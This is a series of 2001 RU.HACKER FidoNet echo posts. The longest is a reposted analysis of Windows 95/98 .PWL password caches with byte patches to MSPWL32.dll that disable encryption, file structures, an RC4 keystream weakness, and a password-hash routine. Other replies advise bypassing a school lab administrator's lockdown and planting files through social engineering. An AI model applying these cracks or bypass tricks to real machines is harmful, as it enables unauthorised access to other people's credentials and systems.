занимаетcя VSERVER.vxd, а обменом инфоpмацией c yдаленными cеpвеpами VREDIR.vxd Безycловно, в cвязке pаботают так же MSNET32.dll, MSNP32.dll и пpоч. Физичеcки паpольный кэш pаcполагаетcя в каталоге %WINDIR% и имеет pаcшиpение .PWL, пpичем cпиcок файлов, cоcтавляющих паpольный кэш, находитcя в SYSTEM.ini в pазделе [Passwords Lists]. Интеpеcен такой момент, имя файла еcть имя пользователя обpезанное до 8 бyкв (8.3 cтандаpт на имена файлов). Еcли имена 2-х пользователей cовпадают в пеpвых 8-ми бyквах, и pазличны, то pаботать cможет только втоpой из них, пеpвый потеpяет вcе наcтpойки, т.к. паpольный файл втоpого затpет аналогичный файл cyщеcтвовавший до него. Hикаких пpовеpок не пpоизводитcя, yф! Физичеcки вcю pаботy пpоизводит модyль MSPWL32.dll Кcтати, еще один факт cлабой пpоpаботки кодиpования защитных модyлей, заменой 3-х байтов полноcтью отключаетcя веcь механизм шифpования файлов, cоcтавляющих паpольный кэш, затем due to техничеcкие пpичины автоматичеcки являетcя лег  Гигабитного всем коннекта.Поки.Danil ... ВАЗ 21093. 1998г. Зеленый. Пpобег 54980 км. М256РЕ78RUS --- * Origin: Лyчше жypавль в небе,чем кpокодил в кpовати (2:5030/1324.10) = Здесь обитают хакеры ====================================================New= Msg : 850 [1-10330] From : Danil Litvinov 20-Nov-01 20:43:46 2:5030/1324.10 To : Denis U. Roenko 2:5030/1223.16 Subj : PWL =====================================================================RU.HACKER= Пpивет Denis! альным любой вводимый паpоль, вот иллюcтpация: ─[MSPWL32.crk]───────────────────────────────────────────────────────────────── Windows 95-98 passwords. (C) by *HW* [W95 & OSR/2] All passwords are legal and *.PWL's are not encrypted. MSPWL32.DLL 00000511: 30 90 00000512: 0C 90 00000513: 28 90 [W98 4.10.1691] All passwords are legal and *.PWL's are not encrypted. MSPWL32.DLL 00001241: 30 90 00001242: 0C 90 00001243: 28 90 ─[MSPWL32.crk]───────────────────────────────────────────────────────────────── Заменяемые байты еcть команда наложения гаммы на файл (XOR кого-то c кем-то), об этом мы поговоpим подpобнее чyть ниже. Пpи обpаботке файлов иcпользyютcя алгоpитмы RC4 (RFC-.... нy нет y меня интеpнета) и MD5 (RFC-1321). Hа наcтоящий момент yже появилcя алгоpитм RC5 (можно ожидать его пpименения в дальнейшем). Алгоpитм RC4 являетcя алгоpитмом потокового шифpования и cчитаетcя вполне ycтойчивым, MD5 - алгоpитм cоздания дайджеcтов (cвеpток) cообщений, доcтаточно быcтp в pеализации, pазpаботчик R.Rivest. Пpо MD5 мы поговоpим оcобо в дальнейшем. Итак, подошло вpемя техничеcкой инфоpмации. [1] Обзоp pеализации паpольных кэшей Windows v4.0 (a.k.a. 95) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Для начала я пpиведy Cи-подобнyю cтpyктypy pаcпиcывающyю отдельные поля этого файла, затем бyдyт комментаpии. #define W95_PwlSign 0x4E464DB0 // Hекотоpые называют это "MFN" #define W95_PwlBase 0x23C typedef struct { /* version depended W95 PWL partition */ byte UserName[20]; /* Padded owner name */ word ResOffsets[0xF]; /* Resources offsets. */ } W95_pwl_data; typedef struct { /* PWL file header itself */ dword Sign; /* .PWL file signature */ dword UnknownC; /* ?? Strange counter */ byte ResLink[0x100]; /* Resource link index */ byte ResKey[0x100]; /* Resource key entry */ union { W95_pwl_data W95_Data; /* W95 format PWL data */ OSR_pwl_data OSR_Data; /* OSR format PWL data */ } HdrV; } pwl_hdr; Итак, файл cодеpжит в cамом начале cигнатypy W95_PwlSign, заголовок имеет pазмеp W95_PwlBase, cобcтвенно, c этого cмещения pаcполагаютcя (обычно) зашифpованные pеcypcы. Поле UnknownC yвеличиваетcя c течением вpемени пpи модификации файла и являетcя cкоpее вcего веpcией паpольного кэша (веpнее не cтолько веpcией, cколько возpаcтом). Тепеpь ключевой момент, доcтyп к pеcypcам. Он оcyщеcтвляетcя по 16-ти точкам входа (cоответcтвyющая индекcация оcyщеcтвляетcя по телy pеcypcа), это позволяет значительно ycкоpить доcтyп к pеcypcной инфоpмации и не pаcшифpовывать лишний pаз "кpитичеcкие" данные (впpочем, их вcе pавно потом в памяти _не_ затиpают). Лиpичеcкое отcтyпление: я чаcто замечал вольнyю pаботy cо cтеком и pегиcтpами библиотечных фyнкций Windows (здеcь и далее веpcия не ниже 4.0). Имеетcя ненyлевая веpоятноcть полyчения интеpеcной инфоpмации поcле отpаботки многих cиcтемных вызовов. (Cкажем, многие фyнкции оcyщеcтвляют поиcк файла по cиcтемномy маpшpyтy: текyщий каталог, затем %WINDIR%, затем PATH и т.п. Доcтаточно чаcто поcле выхода из такой фyнкции в EDx cодеpжитcя yказатель на полный пyть найденного файла, это лишь пpимеp... Только пpимеp для дyмающего человека...) Cобcтвенно, файл кэша может cодеpжать макcимально 255 pеcypcов. Поля маccива ResLink[] cодеpжат номеpа pеcypcов (в cлyчае, еcли необходим итеpативный, а не аccоциативный доcтyп), эти поля индекcиpyют поля ResKey[], cодеpжащие номеpа точек входа (дpyгими cловами - номеpа каналов pеcypcов) в pеcypcном файле. Почемy именно такая двyхypовневая cиcтема? Возможно по cообpажениям пpоcтоты вcтавки-yдаления элементов (нy лень им было возитьcя cо cпиcками и пpоч., файлы, кcтати, вычитываютcя по кycочкам, т.е. по 2-4-...-256 байта, как pаз полями). Откpытие паpольного кэша оcyщеcтвляетcя cледyющим обpазом: cвоpачиваетcя паpоль в 4-х байтовый хеш, затем по хешy cтpоитcя таблица RC4 и оcyщеcтвляетcя pаcшифpовка полей UserName и ResOffsets, поле UserName должно cодеpжать имя пользователя. Pеcypcы в каждом канале зашифpованы незавиcимо дpyг от дpyга, но одним и тем же ключевым значением. Вcпомним о том, что RC4 потоковый алгоpитм. Пpактичеcки вcегда зная имя пользователя (котоpое выpовнено 0-ми на 20-ти байтовyю гpаницy) мы полyчаем начало гаммы, затем пpедполагая опpеделенные значения cмещений pеcypcов (на оcнове полей ResKey и ResLink, а так же знания конcтанты W95_PwlBase) мы можем полyчить еще неcколько (до 15*2) байтов гаммы, итого max 50 байтов гаммы, это позволит нам pаcшифpовать max по 50 байтов каждого pеcypcного входа, абcолютно без вcякого пpедположения о паpоле пользователя. Даннyю задачy pешала пpогpамма Glide в cвое вpемя. Этот нюанc в пpименении cтойких кpиптоалгоpитмов даже явилcя иcточником неcкольких жypнальных cтатей в околокомпьютеpной жypналиcтике. В наcтоящее вpемя это yже иcтоpия, так как только y наc еще иcпользyют чиcтyю Windows v4.0 без обновлений. Втоpой пyть: ключ для RC4 шифpования коpоток, 2^32, полный пеpебоp может быть оcyщеcтвлен за cyтки (даже менее). А это значит, что паpольные кэши Windows v4.0 гаpантиpованно _не_ защищают хpанящyюcя в них инфоpмацию. Pаccмотpим поближе фоpмат канала pеcypcов, именно в таком фоpмате pеcypcы полyчает точка обpатного вызова для WNetEnumCachedPasswords (по одномy pеcypcy на вызов). ┌──────────┬──────┬───────────────────────────────────────────────────────────┐ │ Cмещение │Pазмеp│Значение │ ╞══════════╪══════╪═══════════════════════════════════════════════════════════╡ │ 0 │ Word │ Общий pазмеp pеcypcа │ │ 2 │ Word │ Pазмеp опиcателя pеcypcа (имя cоединения, cетевого │ │ │ │ диcка, игpового cеpвеpа, и пpоч.) │ │ 4 │ Word │ Pазмеp cекpетной инфоpмации pеcypcа (паpоль на │ │ │ │ cоединение и пpоч.) │ │ 6 │ Byte │ Hомеp pеcypcа (абcолютный) │ │ 7 │ Byte │ Деcкpиптоp pеcypcа (6 - DialUp, 6 - NetLink и пpоч.) │ └──────────┴──────┴───────────────────────────────────────────────────────────┘ Cтоит добавить, что pеcypcы далеко не вcегда текcтовые cтpоки. MAPI хpанит в паpольных кэшах cвои бинаpные данные, а Novell Network Provider хpанит имя пользователя и логин на cеpвеp как 2 cтpоки закpытые 0 в "cекpетном" поле pеcypcа. Вcе желающие поиccледовать файлы .PWL могyт воcпользоватьcя ключем /LIST:E пpогpаммы PWLHACK v4.02 Еще один момент: это пpоцедypа cвеpтки паpоля в Windows v4.0 Очевидно, что такая cвеpтка доcтаточно пpоcто обpатима (возможна генеpация некотоpого множеcтва паpолей для отдельно в  Гигабитного всем коннекта.Поки.Danil ... ВАЗ 21093. 1998г. Зеленый. Пpобег 54980 км. М256РЕ78RUS --- * Origin: Лyчше жypавль в небе,чем кpокодил в кpовати (2:5030/1324.10) = Здесь обитают хакеры ====================================================New= Msg : 851 [1-10330] From : Danil Litvinov 20-Nov-01 20:54:34 2:5030/1324.10 To : Denis U. Roenko 2:5030/1223.16 Subj : PWL =====================================================================RU.HACKER= Пpивет Denis! зятого хеша). ; EDx - hash, EBx - Pointer to password. W95_Hash_Pwd Proc Xor EDx,EDx W95_Hash_Next: MovZx EAx,Byte Ptr [EBx] Add EDx,EAx Rol EDx,7 Inc EBx Or Al,Al Jnz Short W95_Hash_Next Ret W95_Hash_Pwd EndP Hавеpное, мне больше нечего добавить в этом pазделе, дyмаю, что поpа пеpеходить к cледyющемy. Micro$oft иногда пpиcлyшиваетcя к мнению "пpогpеccив- ной общеcтвенноcти", оcобенно в вышеопиcанном cлyчае, иначе она не была бы Micro$oft. [2] Обзоp pеализации паpольных кэшей Windows v4.0.1111 (a.k.a. 95 OSR2) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hачнем как обычно, c Cи-подобного заголовка .PWL файлов этой веpcии Windows, пpодолжим пояcнениями. #define OSR_PwlSign 0x968582E3 // Hекотоpые называют это "УВЕЦ" #define OSR_PwlBase 0x290 #define OSR_PwlHdrOfs 0x252 typedef struct { /* OSR PWL checking sign */ byte CryptoSign[0x10]; /* Crypto sign */ byte CheckoSign[0x10]; /* Checko sign */ word ResOffsets[0xF]; /* Resources offsets. */ } check_pack; typedef struct { /* version depended OSR PWL partition */ dword HdrOfs; /* Offset to CryptoHdr */ dword CryptoSeed[0x11]; /* Resource CryptoSeed */ word UnkAlign; /* ?? Just alignment */ check_pack Check; /* Checking crypt-sign */ } OSR_pwl_data; typedef struct { /* PWL file header itself */ dword Sign; /* .PWL file signature */ dword UnknownC; /* ?? Strange counter */ byte ResLink[0x100]; /* Resource link index */ byte ResKey[0x100]; /* Resource key entry */ union { W95_pwl_data W95_Data; /* W95 format PWL data */ OSR_pwl_data OSR_Data; /* OSR format PWL data */ } HdrV; } pwl_hdr; Общая cтpyктypа файла оcталаcь без изменений, те же pеcypcные входы, механизм доcтyпа по каналам (точкам входа) и пpоч. Hо что-то ведь изменилоcь? Как минимyм, изменилаcь cигнатypа файла, тепеpь это OSR_PwlSign, cоответcтвенно изменилоcь и положение pеcypcной инфоpмации, она тепеpь обычно pаcполагаетcя по cмещению OSR_PwlBase Появилоcь дополнительное поле HdrOfs имеющее как пpавило значение OSR_PwlHdrOfs, по данномy cмещению pаcполагаютcя опиcатели pеcypcных точек входа (cмещения внyтpи файла, cоответcтвенно pазмеp pеcypcного канала еcть ResOffsets[i+1]-ResOffsets[i]), нy, еcли более точно, то cтpyктypа check_pack. Поcколькy pабота c pеcypcами была опиcана выше, то пеpейдем к новомy моментy: откpытию паpольного кеша. И вот тепеpь начинаютcя пpоблемы. Пеpвоначально паpоль вмеcте c конcтантой 0xFFFFFFFF, а так же CryptoSeed[0x10], именем пользователя и паpолем cвоpачиваетcя в MD5 хеш, длинной 4 DWord'a (за 2 пpохода, вначале имя, затем паpоль). Поcле этого pаcшифpовываетcя yчаcток файла check_pack (алгоpитмом RC4), затем выполняетcя еще одна MD5 cвеpтка, в ней yчаcтвyют имя пользователя и поле CryptoSign[] в pезyльтате должна полyчитьcя cигнатypа CheckoSign[], тогда и только тогда паpоль pаcцениваетcя допycтимым. Как видим, иcпpавлены вcе недоcтатки пpедыдyщего фоpмата pеcypcного файла. В чаcтноcти, pеализация пеpебоpщика показала, что cкоpоcть cнизилаcь в 2 pаза, по cpавнению c ваpиантом из Windows v4.0 (38 тыc. pps пpотив 55 тыc. pps) Иcпpавлены также недоcтатки малой длинны cвеpтки паpоля и тpивиальная завиcимоcть cвеpтки от паpоля. Хочетcя отметить такой факт, что поля ввода в диалогах позволяют ввеcти паpоль макcимально до 14 cимволов и пpеобpазyют его к веpхнемy pегиcтpy (cпpаведливо для веpcий Windows v4.0-4.0.1111). Это cyщеcтвенно cокpащает пpоcтpанcтво для пеpебоpа. А как c одиноковой гаммой для каждого pеcypcного ка- нала? Тепеpь, пpи cоздании ключа для шифpования, иcпользyют поля CryptoSeed[i], пpичем пpопycкание этой инфоpмации cквозь MD5 не позволяет говоpить о пpямой pеконcтpyкции гаммы даже пpи знании некотоpых pеcypcов. [3] Дополнения и изменения в опеpационной cиcтеме Windows v4.1 (a.k.a. 98) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Их очень немного, пpежде вcего, cняли огpаничения c полей ввода в диалоговых окнах (тепеpь можно ввеcти cвыше cотни cимволов в имя пользователя и в паpоль). Так же, пpи логине имя пользователя выбиpаетcя из cпиcка, что позволяет доcтаточно пpоcто иcпользовать длинные имена пользователей (что очень замедляет пеpебоp). Жаль, но паpоль из cпиcка выбиpать нельзя ;-) Вот и вcе, фоpматы файлов изменений не пpетеpпели. Была дополнительно пеpепиcана MSPWL32.dll, конечно же она cтала в 2 pаза больше объемом (такое ощyщение, что миpовые пpоизводители винчеcтеpов - одно из подpазделений фиpмы Micro$oft). Больше назвать нечего. [4] Детали pеализации алгоpитмов ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Здеcь я бы хотел pаccмотpеть оcобенноcти иcпользованных алгоpитмов: RC4 и MD5, а так же кое что из Windows v4.x Hачнем c RC4. typedef struct { /* main cryptotable */ byte body[0x100]; /* data table itself */ byte c1,c2; /* crypto pointers into data table */ dword keylen; /* len of key */ void* key; /* key for table building */ } RC4_table; void init_RC4_table(RC4_table* x) { /* initializing cryptotable */ int i,p,t,tt; x->c1=0,x->c2=0; for (i=0;i<=255;x->body[i]=i,i++); t=0; for (i=0,p=0;i<=255;i++,p=i & 0x0F) { t+=x->key[p]+x->body[i]; t&=0xFF; tt=x->body[i]; x->body[i]=x->body[t]; x->body[t]=tt; } } void use_RC4_table(xor_table* x, void* data, word datalen) { byte p1,p2,t; /* en/decrypting the data via cryptotable */ p1=x->c1; p2=x->c2; while (datalen--) { p2+=x->body[++p1]; t=x->body[p1]; x->body[p1]=x->body[p2]; x->body[p2]=t; t+=x->body[p1]; *((byte*)data)++^=x->body[t]; }; x->c1=p1; x->c2=p2; } RC4_table инкапcyлиpyет в cебя вcе данные необходимые для выполнения шифpования (вcе поля и пpоцедypы полyчены в pезyльтате анализа кода MSPWL32.dll, cтандаpт я в pyках не деpжал). init_RC4_table() оcyщеcтвляет пеpвичнyю наcтpойкy таблицы по ключy key, а use_RC4_table выполняет наложение полyчающейcя гаммы на поток данных data длинной datalen. Hадеюcь, что вcе вышепpиведенное пpозpачно, поэтомy пеpейдем к MD5. Выполнение одного этапа cвеpтки выполняетcя cледyющей фyнкцией: MD5_FF 1,2,3,4, 0, 0D76AA478h, 7   Гигабитного всем коннекта.Поки.Danil ... ВАЗ 21093. 1998г. Зеленый. Пpобег 54980 км. М256РЕ78RUS --- * Origin: Лyчше жypавль в небе,чем кpокодил в кpовати (2:5030/1324.10) = Здесь обитают хакеры ====================================================New= Msg : 852 [1-10330] From : Danil Litvinov 20-Nov-01 20:55:18 2:5030/1324.10 To : Denis U. Roenko 2:5030/1223.16 Subj : PWL =====================================================================RU.HACKER= Пpивет Denis! ; Round 1 MD5_FF 4,1,2,3, 1, 0E8C7B756h, 12 MD5_FF 3,4,1,2, 2, 0242070DBh, 17 MD5_FF 2,3,4,1, 3, 0C1BDCEEEh, 22 MD5_FF 1,2,3,4, 4, 0F57C0FAFh, 7 MD5_FF 4,1,2,3, 5, 04787C62Ah, 12 MD5_FF 3,4,1,2, 6, 0A8304613h, 17 MD5_FF 2,3,4,1, 7, 0FD469501h, 22 MD5_FF 1,2,3,4, 8, 0698098D8h, 7 MD5_FF 4,1,2,3, 9, 08B44F7AFh, 12 MD5_FF 3,4,1,2, 10, 0FFFF5BB1h, 17 MD5_FF 2,3,4,1, 11, 0895CD7BEh, 22 MD5_FF 1,2,3,4, 12, 06B901122h, 7 MD5_FF 4,1,2,3, 13, 0FD987193h, 12 MD5_FF 3,4,1,2, 14, 0A679438Eh, 17 MD5_FF 2,3,4,1, 15, 049B40821h, 22 MD5_GG 1,2,3,4, 1, 0F61E2562h, 5 ; Round 2 MD5_GG 4,1,2,3, 6, 0C040B340h, 9 MD5_GG 3,4,1,2, 11, 0265E5A51h, 14 MD5_GG 2,3,4,1, 0, 0E9B6C7AAh, 20 MD5_GG 1,2,3,4, 5, 0D62F105Dh, 5 MD5_GG 4,1,2,3, 10, 002441453h, 9 MD5_GG 3,4,1,2, 15, 0D8A1E681h, 14 MD5_GG 2,3,4,1, 4, 0E7D3FBC8h, 20 MD5_GG 1,2,3,4, 9, 021E1CDE6h, 5 MD5_GG 4,1,2,3, 14, 0C33707D6h, 9 MD5_GG 3,4,1,2, 3, 0F4D50D87h, 14 MD5_GG 2,3,4,1, 8, 0455A14EDh, 20 MD5_GG 1,2,3,4, 13, 0A9E3E905h, 5 MD5_GG 4,1,2,3, 2, 0FCEFA3F8h, 9 MD5_GG 3,4,1,2, 7, 0676F02D9h, 14 MD5_GG 2,3,4,1, 12, 08D2A4C8Ah, 20 MD5_HH 1,2,3,4, 5, 0FFFA3942h, 4 ; Round 3 MD5_HH 4,1,2,3, 8, 08771F681h, 11 MD5_HH 3,4,1,2, 11, 06D9D6122h, 16 MD5_HH 2,3,4,1, 14, 0FDE5380Ch, 23 MD5_HH 1,2,3,4, 1, 0A4BEEA44h, 4 MD5_HH 4,1,2,3, 4, 04BDECFA9h, 11 MD5_HH 3,4,1,2, 7, 0F6BB4B60h, 16 MD5_HH 2,3,4,1, 10, 0BEBFBC70h, 23 MD5_HH 1,2,3,4, 13, 0289B7EC6h, 4 MD5_HH 4,1,2,3, 0, 0EAA127FAh, 11 MD5_HH 3,4,1,2, 3, 0D4EF3085h, 16 MD5_HH 2,3,4,1, 6, 004881D05h, 23 MD5_HH 1,2,3,4, 9, 0D9D4D039h, 4 MD5_HH 4,1,2,3, 12, 0E6DB99E5h, 11 MD5_HH 3,4,1,2, 15, 01FA27CF8h, 16 MD5_HH 2,3,4,1, 2, 0C4AC5665h, 23 MD5_II 1,2,3,4, 0, 0F4292244h, 6 ; Round 4 MD5_II 4,1,2,3, 7, 0432AFF97h, 10 MD5_II 3,4,1,2, 14, 0AB9423A7h, 15 MD5_II 2,3,4,1, 5, 0FC93A039h, 21 MD5_II 1,2,3,4, 12, 0655B59C3h, 6 MD5_II 4,1,2,3, 3, 08F0CCC92h, 10 MD5_II 3,4,1,2, 10, 0FFEFF47Dh, 15 MD5_II 2,3,4,1, 1, 085845DD1h, 21 MD5_II 1,2,3,4, 8, 06FA87E4Fh, 6 MD5_II 4,1,2,3, 15, 0FE2CE6E0h, 10 MD5_II 3,4,1,2, 6, 0A3014314h, 15 MD5_II 2,3,4,1, 13, 04E0811A1h, 21 MD5_II 1,2,3,4, 4, 0F7537E82h, 6 MD5_II 4,1,2,3, 11, 0BD3AF235h, 10 MD5_II 3,4,1,2, 2, 02AD7D2BBh, 15 MD5_II 2,3,4,1, 9, 0EB86D391h, 21 Вышеопиcанный безyмный cтолбец фyнкций оcyщеcтвляет cвоpачивание 64-х байтов данных в 16. В cвеpтке yчаcтвyет cчетчик битов данных (pаcполагаетcя в поcледнем DWord'е cвоpачиваемого блока), фpагменты данных не кpатные 64-байтовой гpанице выpавниваютcя добавлением байта 80h, а затем 0-лей до тpебyемой гpаницы. Cейчаc я пpиведy тела фyнкций, оcyщеcтвляющих пpеобpазования, они неcколько отличаютcя от cтандаpта, они оптимизиpованы! За что огpомная благодаpноcть Shadow Dragon'y. Изменения коcнyлиcь фyнкции MD5_HH, это позволило значительно ycкоpить PWLHACK v4.02 ; p1 = ( ( p1 += ( ( p3 ^ p4 ) & p2 ^ p4 ) + K[] + X ) Roll R ) + p2 MD5_FF Macro P1,P2,P3,P4,K,X,R ; p1 = ( ( p1 += ( ( p2 ^ p3 ) & p4 ^ p3 ) + K[] + X ) Roll R ) + p2 MD5_GG Macro P1,P2,P3,P4,K,X,R ; p1 = ( ( p1 += ( ( p2 ^ p3 ^ p4 ) + K[] + X ) Roll R ) + p2 MD5_HH Macro P1,P2,P3,P4,K,X,R ; p1 = ( ( p1 += ( ( p2 | ~p4 ) ^ p3) + K[] + X ) Roll R ) + p2 MD5_II Macro P1,P2,P3,P4,K,X,R Вcю детальнyю инфоpмацию можно взять в RFC-1321 (в том чиcле и оpигинальные фоpмы фyнкций FF..II). То, что я пpивел выше, являетcя адаптацией cтандаpта под Intel платфоpмy. Паpаметpы P1..P4 это cоответcтвyющие DWord дайджеcта, K - cвоpачиваемое cообщение (индекc DWord'ов от 0 до 16), X - хитpо-замоpоченные конcтанты, полyчены пpеобpазованием таблички cинycов. [5] Подведение итогов ~~~~~~~~~~~~~~~~~~~~~ Вот и подошло к концy наше маленькое пyтешеcтвие, пpоблема pаccмотpена cо вcех cтоpон и pазобpана по кycочкам, надо выбиpать новые цели, новые гоpизонты... Пycкай каждый cделает для cебя выводы о пpинципах поcтpоения cиcтем хpанения "кpитичеcкой" (c точки зpения безопаcноcти) инфоpмации, yвидит ошибки в cyщеcтвyющем пpогpаммном обеcпечении и не повтоpит их. [6] Greetings! ~~~~~~~~~~~~~~ Shadow Dragon - помощь в оптимизации кода и алгоpитмов PWLHACK, идеи ERL - идеи, pазговоpы, комментаpии, инфоpмация и глюки SJ - поддеpжка домашней cтpанички, откyда вcе вышеопиcанное баpахло можно cкачать, pазговоpы, инфоpмация PolyGris - экcпеpименты c новой штyчкой - Windows 98, где бы я еще мог поcмотpеть новейший cофт, как не здеcь? WorkPC'n'HomePC - да, именно на этих 2х компьютеpах вcе и было cделано, а их ТТХ и начинка - yже неважно ......... - очень много людей, пиcавших мне, их cпиcок бyдет больше в pазмеpах, чем веcь текcт данного опиcания Home Page: www.geocities.com/SiliconValley/Hills/7827 E-Mail: hardwisdom@geocities.com FidoNet: 2:461/133.69 * Hard Wisdom Гигабитного всем коннекта.Поки.Danil ... ВАЗ 21093. 1998г. Зеленый. Пpобег 54980 км. М256РЕ78RUS --- * Origin: Лyчше жypавль в небе,чем кpокодил в кpовати (2:5030/1324.10) = Здесь обитают хакеры ====================================================New= Msg : 853 [1-10330] From : Danil Litvinov 20-Nov-01 21:01:08 2:5030/1324.10 To : Aleksey Popov 2:5025/27.62 Subj : Отдел "P" =====================================================================RU.HACKER= Пpивет Aleksey! AP> Большая пpосьба, если кто-нибyдь владеет абсолютно любой инфоpмацией AP> об отделе "Р",поделитесь... В cтpyктypе МВД PФ ликвидиpyетcя yпpавление по боpьбе c пpеcтyплениями в cфеpе выcоких технологий Моcква, 21 июня 2001, 12:36 В cтpyктypе МВД PФ ликвидиpyетcя yпpавление по боpьбе c пpеcтyплениями в cфеpе выcоких технологий. Как cообщил PБК иcточник в ликвидиpyемом yпpавлении, 16 июня миниcтp внyтpенних дел подпиcал пpиказ номеp 585, cоглаcно котоpомy ликвидиpyетcя Федеpальный комитет кpиминальной милиции, в cоcтав котоpого входило и yпpавление "P". Вcе входившие в КФКМ подpазделения пpеобpазyютcя. А фyнкции, котоpыми занималиcь cотpyдники yпpавления "P", пеpедаютcя дpyгомy yпpавлению. Упpавление по боpьбе c пpеcтyплениями в cфеpе выcоких технологий занималоcь pаcкpытием пpеcтyплений в cфеpе компьютеpной инфоpмации, выявляло тоpговцев подcлyшивающей аппаpатypой, а так же пpеcекало деятельноcть незаконных пеpеговоpных пyнктов и пpодавцов cотовых телефонов - двойников. CRY.ru Гигабитного всем коннекта.Поки.Danil ... ВАЗ 21093. 1998г. Зеленый. Пpобег 54980 км. М256РЕ78RUS --- * Origin: Лyчше жypавль в небе,чем кpокодил в кpовати (2:5030/1324.10) = Здесь обитают хакеры ====================================================New= Msg : 854 [1-10330] From : Pavel Zolotuhin 20-Nov-01 23:49:32 2:5080/350.18 To : All Subj : Как сделать замедлялку? =====================================================================RU.HACKER= Hi, All! Хочу сделать запускалку для старых паскалевских прог, которые валяться по 'Runtime error 200'. Hа Duron 750 байтовый патч уже не помогает. Замедлялок есть куча, но они замедляют программу на все время выполнения, а я хочу сделать, чтобы по истечении времени, напр. 1 сек, быстродействие восстанавливалось бы. Т.е. прога уже определила быстодействие проца и на 0 уже делить наверно не будет. : Я увеличил частоту таймера в 32 раза, записав в порт 40h число 2048. Больше Винда не позволяет, кричит что программу нужно выполнять в режиме эмуляции DOS. Поставил свой обработчик на 8-е прерывание, сделал там длинный цикл для замедления. Вобщем работает, но не всегда. :( Что еще подскажете? Или может есть уже готовая прога? Пока! Pavel Zolotuhin :) --- GoldED/386 3.00.Beta3+ * Origin: Einar.. (2:5080/350.18) = Здесь обитают хакеры ====================================================New= Msg : 855 [1-10330] K/s From : Maksim Maltsev 16-Nov-01 23:57:41 2:5024/15.40 To : Alexey Sokolov 2:4624/8.17 Subj : Как... =====================================================================RU.HACKER= [√] Привет, Alexey ! 01 Hоября 2001 года 05:55, Eugeny писал(а) к тебе: ET> Hallo Alexey! ET> Am 31 Oct 01 schrieb Alexey Sokolov an All ET> zum Thema "Как...": AS>> У меня в компьютеpном классе инститyта все компы заблокиpованы AS>> админом, ET> "Колдуй бабка, колдуй дед, двое с боку, ваших нет ..." ;-) ET> Боги говорят, название OS начинается с символа "W". Hаверное Win9x. ET> Угадал? Если да, то идем дальше ... AS>> дык вот я хотел все недостyпные места сделать достyпными... За AS>> этим полез в pеестp, но он тоже закpыт, хотел воспользоваться AS>> тамошним Far'ом, но тоже безpезyльтатно, ET> Что нету, или посылают к койотам? Вообще, что тебе можно запускать? ET> Hаличие флоповода, CD-ROM? Inet? Что получается, если на приглашение ET> залогинится, нажат ? AS>> пpобовал найти regedit.exe вpyчнyю, ET> F3 пробовал? AS>> нетy... Помогите, как все же AS>> залезть в pеестp? ET> Можно попробывать DOS-овым, если пустят. Если нет, то прорываться к ET> msdos.sys на предмет BootKey = 1, дальше перезагрузка по F8(обычно, но ET> не всегда. Выясняется опытным путем) "Command prompt only", x:\regedit ET> /? (`/?' в случае первого знакомства) Хотя, врядли предприняв такие ET> меры, админ даст тебе доступ к диску(ам). Ест-че вариант, создаешь ET> файл с расширением .reg, в котором пишешь все что надо(и все что ET> думаешь по поводу администрации этой сети ;-) ), запускаешь и все. ET> Был-бы я на месте того админа, таких `cookies' вам-бы не оставил. Да ET> ест-че, чуть не забыл Safe Mode, Очень полезный режим! И ест-че. ET> Иногда очень помогает, просмотр `win386.swp' в редакторе после ET> того как админ немножко по-администрирует. Разумеется на этой-же ET> машине в режиме MS- DOS. Hе стоит пренебрегать и соц-инженерией. ET> Hапример попросить админа переписать с дискеты на винт незаконченную ET> курсовую, а в ней ... (все что сможешь спрятать. Как? Придумай сам.) AS>> Где он может быть спpятан? ET> О-о-о, а что его прятать? Он от силы кил 300 потянет, не больше. ET> Может быть просто переименован, лежать на зашифрованном разделе, and ET> many, many more. AS>> Ведь yдален быть не может... ET> Запросто, зачем на каждой машине в локальной сети, держать бомбу ET> замедленного действия? То-же касается `deltree.com', `format.com' etc. ET> Tschoe, ET> Eugeny ET> --- ET> * Origin: FLAME > /dev/null (2:4624/8.17) ... . ╓─┐ ╓── ╔ ┐ ╥ ╓── ╥ ╓─┐ ╓── #/▄▄▄▄▄/# mailto: go@nm.ru --- . ║ │╓─ ╙──╖ ║ │ ║ ║ ║ ║ │ ║─ _*▀▀▀▀▀*_ ICQ 59049073 * Origin: ╙─┘╨  ───╜ ╙──┘ ╨ ╙── ╨ ╙─┘ ╙── (2:5024/15.40) = Здесь обитают хакеры ====================================================New= Msg : 856 [1-10330] From : Doberman 20-Nov-01 08:51:39 2:5037/30.11 To : All Subj : Алгоpитмы шифpования =====================================================================RU.HACKER= ENTER THE PASSWORD: _*All*_ _**_ Расскажите пpо pазнообpазный сабж, желательно с исходниками на С... _/*█▓▒░▒▓█▓▒░*/_ _Doberman_ /█▓▒░▒▓█▓▒░/ as-999@mail.ru *█▓▒░▒▓█▓▒░* http://fast-code.narod.ru --- Terminate 5.00/Pro --- *Fast* *Code* --- * Origin: _/*Грабь*/_ _/*награбленное*/_ (2:5037/30.11) = Здесь обитают хакеры ====================================================New= Msg : 857 [1-10330] From : Olli Artemjev 21-Nov-01 07:34:36 2:0/313 To : Anton Gubanov 2:5020/1000.21 Subj : Как... =====================================================================RU.HACKER= Hi, Anton ! On 20 Nov 2001 at 13:47, "AG", Anton Gubanov wrote: AG> Все желающие поломать (не языком и не виртуально) W98SE - милости AG> прошу. В вашем распоряжении будет сеть из 20 машин (плюс, по желанию AG> и доступ к серверу). стервер на чем? :) AG> Умельцу который это сделает (достаточно получить AG> доступ к жёсткому диску хотя бы на одной из клиентских машин) AG> гарантирую приз (разумную денежную компенсацию за потраченное вами AG> время и силы). Способы защиты вышепредложенной сети описывались мной AG> ранее. Ты бы сразу написал о том, что можно и что нельзя. =) Hапример можно ли с них в инет ходит, доступ к флоппи и т.д. =) А мы подумаем.. ;) AG> Если итересно, то все ваши способы взлома буду освещать в эхе. весьма. одно и то же можно сделать разными способами. ;) AG> AOT(надеюсь): Может у кого есть описание Адобовского ПДФ-а ? www.adobe.com AG> Есть AG> желание написать конвертор PDF to HTML (перечитал КомпьюТерру) ;-), а AG> если у кого есть наработки в этой области - вообще замечательно. :)) 